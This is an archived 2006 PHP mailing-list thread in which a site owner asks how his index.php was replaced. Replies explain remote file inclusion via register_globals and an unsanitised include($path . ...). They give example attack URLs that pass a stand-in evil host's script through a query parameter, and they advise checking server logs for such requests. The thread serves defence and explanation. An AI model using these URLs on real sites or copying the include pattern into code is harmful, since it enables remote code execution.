With register_globals on, the globals super array ($_POST, $_GET, $_REQUEST)
are automatically populated into variables. With that in mind
www.example.com/index.php?path=remoteexplot.com/ would then yield
include('remoteexplit.com/foo'); thus including ANY code they wish.
----- Original Message ----
From: bruce <[EMAIL PROTECTED]>
To: Eric Butera <[EMAIL PROTECTED]>; tedd <[EMAIL PROTECTED]>
Cc: PHP General List <php-general@lists.php.net>
Sent: Monday, November 13, 2006 11:55:13 AM
Subject: RE: [PHP] Highjack?
eric...
you say how embarrasing regaring the $path.'foo'.... i'm curious, why/how is
this simple piece of code exploitable. assuming $path is not something that
comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...
thoughts/explanations...
thanks
-----Original Message-----
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?
On 11/13/06, tedd <[EMAIL PROTECTED]> wrote:
> Hi gang:
>
> While this is not an obvious php question, it does deal with security
> which is a concern.
>
> Just this morning had a couple of my sites "highjacked". What I found
> was someone had replaced my root level index.php with their own
> index.php. You can see the result at:
>
> http://xn--u2g.com/index1.php
>
> It was not a terrible loss nor inconvenience, but I wonder how they
> did it. Any ideas how this was done and suggestions as to how to
> prevent this from happening again?
>
> Thanks,
>
> tedd
>
> --
> -------
> http://sperling.com http://ancientstones.com http://earthstones.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Tedd,
I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project. I'd say the first thing would be to try and
find any include/require statements that are exploitable. In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.
If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
